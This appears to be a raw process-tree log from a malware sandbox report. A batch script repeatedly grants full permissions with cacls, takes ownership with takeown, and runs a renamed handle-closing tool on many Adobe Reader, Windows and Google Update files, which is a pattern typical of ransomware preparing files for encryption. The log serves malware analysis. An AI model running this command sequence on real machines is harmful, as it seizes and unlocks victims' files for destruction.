C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "tl.gif" -nobanner4⤵PID:964
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:688
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V""2⤵PID:1960
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C3⤵PID:1980
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1556
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "Identity-V" -nobanner3⤵PID:1168
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "Identity-V" -nobanner4⤵PID:1176
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2036
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf""2⤵PID:1020
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf" /E /G Admin:F /C3⤵PID:1120
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf"3⤵
- Modifies file permissions
PID:860
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "MyriadPro-Bold.otf" -nobanner3⤵PID:1948
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "MyriadPro-Bold.otf" -nobanner4⤵PID:1488
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1828
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe""2⤵PID:948
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe" /E /G Admin:F /C3⤵PID:1964
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe"3⤵
- Modifies file permissions
PID:564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "SC_Reader.exe" -nobanner3⤵PID:1216
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "SC_Reader.exe" -nobanner4⤵PID:688
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1200
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths""2⤵PID:1060
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" /E /G Admin:F /C3⤵PID:1472
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths"3⤵PID:1832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "brt55.ths" -nobanner3⤵PID:1684
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "brt55.ths" -nobanner4⤵PID:224
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1232
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp""2⤵PID:1408
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp" /E /G Admin:F /C3⤵PID:1516
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp"3⤵PID:1488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "usa03.hsp" -nobanner3⤵PID:360
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "usa03.hsp" -nobanner4⤵PID:1944
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT""2⤵PID:964
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" /E /G Admin:F /C3⤵PID:528
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT"3⤵PID:688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "CYRILLIC.TXT" -nobanner3⤵PID:1796
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "CYRILLIC.TXT" -nobanner4⤵PID:1808
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1996
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT""2⤵PID:680
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" /E /G Admin:F /C3⤵PID:1256
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"3⤵PID:224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "CP1252.TXT" -nobanner3⤵PID:624
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "CP1252.TXT" -nobanner4⤵PID:1784
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1556
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:1332
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:1560
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵PID:1944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "overlay.png" -nobanner3⤵PID:1136
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "overlay.png" -nobanner4⤵PID:972
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1460
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""2⤵PID:1776
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C3⤵PID:672
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"3⤵PID:796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "directories.acrodata" -nobanner3⤵PID:1756
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "directories.acrodata" -nobanner4⤵PID:1996
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1340
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:2032
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:1980
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵
- Modifies file permissions
PID:2040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "superbar.png" -nobanner3⤵PID:908
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "superbar.png" -nobanner4⤵PID:1212
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵PID:1560
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵PID:1408
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵
- Modifies file permissions
PID:972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "Workflow.Targets" -nobanner3⤵PID:1964
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "Workflow.Targets" -nobanner4⤵PID:1488
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1216
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵PID:672
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:1996
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
PID:564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:1472
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:528
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui""2⤵PID:1120
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui" /E /G Admin:F /C3⤵PID:368
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui"3⤵
- Modifies file permissions
PID:908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "PDIALOG.exe.mui" -nobanner3⤵PID:920
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "PDIALOG.exe.mui" -nobanner4⤵PID:884
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1944
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Windows Journal\Templates\Music.jtp""2⤵PID:1584
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Music.jtp" /E /G Admin:F /C3⤵PID:1332
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Music.jtp"3⤵PID:1964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "Music.jtp" -nobanner3⤵PID:688
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "Music.jtp" -nobanner4⤵PID:360
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1796
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵PID:1960
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:1684
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵PID:1472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:1232
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:1152
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1556
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif""2⤵PID:952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" /E /G Admin:F /C3⤵PID:2032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif"3⤵PID:920
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "br.gif" -nobanner3⤵PID:1408
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "br.gif" -nobanner4⤵PID:1832
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1136
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""2⤵PID:1332
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C3⤵PID:1088
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"3⤵PID:1216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "form_responses.gif" -nobanner3⤵PID:228
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "form_responses.gif" -nobanner4⤵PID:1796
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1584
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""2⤵PID:1776
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C3⤵PID:1824
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"3⤵
- Modifies file permissions
PID:1152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "review_email.gif" -nobanner3⤵PID:1176
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "review_email.gif" -nobanner4⤵PID:1212
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2036
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""2⤵PID:1516
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C3⤵PID:1120
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"3⤵PID:1832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "tr.gif" -nobanner3⤵PID:1468
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "tr.gif" -nobanner4⤵PID:1868
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:976
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf""2⤵PID:360
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf" /E /G Admin:F /C3⤵PID:972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf"3⤵
- Modifies file permissions
PID:1796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "AdobePiStd.otf" -nobanner3⤵PID:1432
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "AdobePiStd.otf" -nobanner4⤵PID:1168
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:548
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""2⤵PID:624
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:1680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"3⤵PID:1212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner3⤵PID:1020
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner4⤵PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:964
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""2⤵PID:1492
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C3⤵PID:1256
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"3⤵PID:1868
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner3⤵PID:948
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner4⤵PID:908
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""2⤵PID:1948
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C3⤵PID:1936
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"3⤵
- Modifies file permissions
PID:1168
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "can.fca" -nobanner3⤵PID:1060
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "can.fca" -nobanner4⤵PID:1808
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1756
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths""2⤵PID:1556
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths" /E /G Admin:F /C3⤵PID:1472
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths"3⤵PID:1960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "usa03.ths" -nobanner3⤵PID:1076
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "usa03.ths" -nobanner4⤵PID:1980
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1152
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""2⤵PID:1828
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C3⤵PID:1944
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"3⤵PID:908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "GREEK.TXT" -nobanner3⤵PID:1088
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "GREEK.TXT" -nobanner4⤵PID:920
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1832
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""2⤵PID:1584
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C3⤵PID:1216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"3⤵PID:1808
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "CP1253.TXT" -nobanner3⤵PID:1824
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "CP1253.TXT" -nobanner4⤵PID:472
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1796
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe""2⤵PID:1684
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe" /E /G Admin:F /C3⤵PID:368
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe"3⤵
- Modifies file permissions
PID:2032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "GoogleUpdateSetup.exe" -nobanner3⤵PID:1120
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "GoogleUpdateSetup.exe" -nobanner4⤵PID:1152
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1176
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""2⤵PID:976
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C3⤵PID:680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"3⤵PID:920
-
-
